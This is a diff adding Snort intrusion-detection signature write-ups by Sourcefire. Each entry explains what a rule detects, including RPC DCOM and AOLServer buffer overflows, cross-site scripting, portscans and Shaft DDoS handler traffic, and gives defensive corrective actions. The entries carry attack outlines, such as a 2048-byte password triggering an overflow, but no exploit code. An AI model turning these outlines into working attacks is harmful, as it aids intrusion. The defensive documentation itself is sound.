+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/476.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+
+Sid:
+476
+
+--
+
+Summary:
+This event is generated when Webtrends Security Scanner generates an ICMP echo
+request message.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+Webtrends Ecurity Scanner generates a ICMP Echo Request message containing the
+following hex signature:
+
+|00000000454545454545454545454545|
+
+By searching for this string in a packet, it is possible to determine
+the type of host that generated the request.
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  The "ping" utility found on most operating systems can generate
+these types of ICMP messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP Echo requests with
+user-defined payloads.  This could allow attackers to replace this
+signature with binary values and conceal their operating system.
+
+--
+
+Corrective Action:
+To prevent information gathering, use a firewall to block incoming ICMP
+Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS307
+
+
+--
--- /dev/null
+++ b/doc/signatures/3167.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3167
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/536.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+536
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000123.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000123
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "pre-teen" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1260.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1260
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in AOLServer.
+
+--
+Impact:
+Possible Denial of Service (DoS) and execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in versions of AOL Server that may allow an
+attacker to overflow a fixed length buffer and execute code of their
+choosing on a vulnerable host.
+
+The problem lies in the processing of user supplied passwords used in
+basic authentication to the host. A long password may exceed a fixed
+length buffer and allow an attacker to overwrite portions of memory and
+execute code of their choosing.
+
+--
+Affected Systems:
+	AOL AOLServer 3.0 and 3.2
+
+--
+Attack Scenarios:
+An attacker needs to supply a password 2048 bytes in length to trigger
+the overflow.
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-vulnerable version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2239.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2239
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in PDGSoft Shopping Cart.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of PDGSoft Shopping Cart suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing.
+
+The vulnerable executable files are redirect.exe and changepw.exe, which
+can be accessed via the web interface.
+
+--
+Affected Systems:
+	PDGSoft Shopping Cart 1.50
+
+--
+Attack Scenarios:
+The attacker needs to supply an overly long string to either of the 
+affected executables.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1256
+
+--
--- /dev/null
+++ b/doc/signatures/719.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+719
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username root.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+login to a telnet server.
+
+--
+Detailed Information:
+This event is generated after a telnet server observes an attempted 
+login with the username root.  It is not possible to tell from this 
+event alone whether or not the attempt was successful.  If this is 
+followed by a login failure event, the root login did not succeeed.  
+However, if no failure message is observed and the rule with SID 718 is 
+enabled, this may indicate that the root login succeeded.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+of root.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Disable root logins to telnet.
+
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/697.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+697
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2251.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid:
+2251
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerablity in Microsoft RPCSS service for RPC.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code leading to
+unauthorized remote administrative access.
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPCSS Service that handles RPC DCOM
+requests such that execution of arbitrary code or a Denial of Service 
+condition can be issued against a host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to the host
+running the RPCSS service may result in a buffer overflow condition that
+will present the attacker with the opportunity to execute arbitrary code
+with the privileges of the local system account. Alternatively the
+attacker could also cause the RPC service to stop answering RPC requests
+and thus cause a Denial of Service condition to occur.
+
+--
+Affected Systems:
+	Windows NT 4.0 Workstation and Server
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a DCERPC bind request followed by a malicious
+DCERPC DCOM remote activation request.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139, 445 and 593 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Disallow the use of RPC over HTTP and HTTPS.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
+
+eEye:
+http://www.eeye.com/html/Research/Advisories/AD20030910.html
+
+--
--- /dev/null
+++ b/doc/signatures/395.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+395
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Network Unknown datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination network is unreachable.
+
+--
+
+Impact:
+This ICMP message will be generated when the destination network specified in the datagram is unreachable.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems or faulty routing
+devices.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no correct action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2044.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2044
+
+--
+Summary:
+The Point to Point Tunneling Protocol (PPTP) is used to connect client 
+machines to internal corporate resources using a Virtual Private Network
+(VPN) across a public network such as the Internet via an encrypted 
+session.
+
+
+--
+Impact:
+Possible loss of data from an internal network to an unknown external 
+source.
+
+--
+Detailed Information:
+This event indicates that a PPTP session from an internal resource to an
+unknown external source has been attempted. This may be an indication of
+an attempt to initialize an encrypted session for nefarious purposes.
+
+An internal user may try to use an encrypted tunnel to evade possible 
+detection when transferring files from an internal resource to an 
+unauthorized eternal party.
+
+--
+Affected Systems:
+All systems allowing PPTP connections from an internal to external 
+source.
+
+--
+Attack Scenarios:
+The user only needs to initiate a connection to an external source.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow PPTP transactions from the internal LAN to external sources.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/632.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+632
+
+--
+Summary:
+This event is generated when an external user scans an internal SMTP server using Network Associates' Cybercop vulnerability scanner. 
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+Cybercop Scanner is scanning software that searches for system vulnerabilities. As one of its scanning procedures, it sends an expn command to SMTP server ports to determine if the SMTP server will return a list of email addresses, aliases, and distribution lists.  
+
+--
+Affected Systems:
+Any SMTP server that returns a list of email addresses, aliases, and distribution lists when queried with the expn command.
+
+--
+Attack Scenarios:
+An attacker may run Cybercop Scanner against SMTP servers in order to determine vulnerabilities that can later be exploited.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable expn on your mail server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2315.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2315
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2900.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2900
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1497.txt
@@ -0,0 +1,82 @@
+Rule:
+--
+Sid:
+1497
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version. If 
+the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+iDefense
+http://www.idefense.com/idpapers/XSS.pdf
+
+CERT
+http://www.cert.org/advisories/CA-2000-02.html
+
+--
--- /dev/null
+++ b/doc/signatures/2838.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2838
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_master_activity
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/912.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+912
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/841.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+841
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000173.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000173
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in RSA Security RSA Authentication Agent For Web.
+
+-- 
+Impact: 
+Cross site scripting leading to possible inclusion of code of the attackers 
+choosing.
+
+--
+Detailed Information:
+A vulnerability exists in RSA Security RSA Authentication Agent For Web that 
+may allow an attacker to include code of their choosing due to the improper 
+checking of user supplied input.
+
+--
+Affected Systems:
+RSA Security RSA Authentication Agent For Web 5.2
+
+--
+Attack Scenarios: 
+An attacker can supply a link to include code of their choosing in data 
+supplied to RSA Security RSA Authentication Agent For Web.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/122-3.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-3
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/230.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+230
+
+--
+Summary:
+This event is generated when a DDoS Shaft client communicates with a Shaft handler.  It is also possible that this event may be generated when any host attempts to discover or detect a Shaft handler.
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft client or a host attempting to discover Shaft handlers.  If the listed destination IP is in your network, it may be a Shaft handler.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to direct them to launch attacks.  A client may communicate with a handler via TCP destination port 20432.
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft client needs to communicate with handlers to direct attacks.
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+A legitimate server port of 20432 will cause this rule to fire.  It may also create a false positive if port 20432 is selected as an FTP data port.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS254
+
+--
--- /dev/null
+++ b/doc/signatures/564.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+564
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
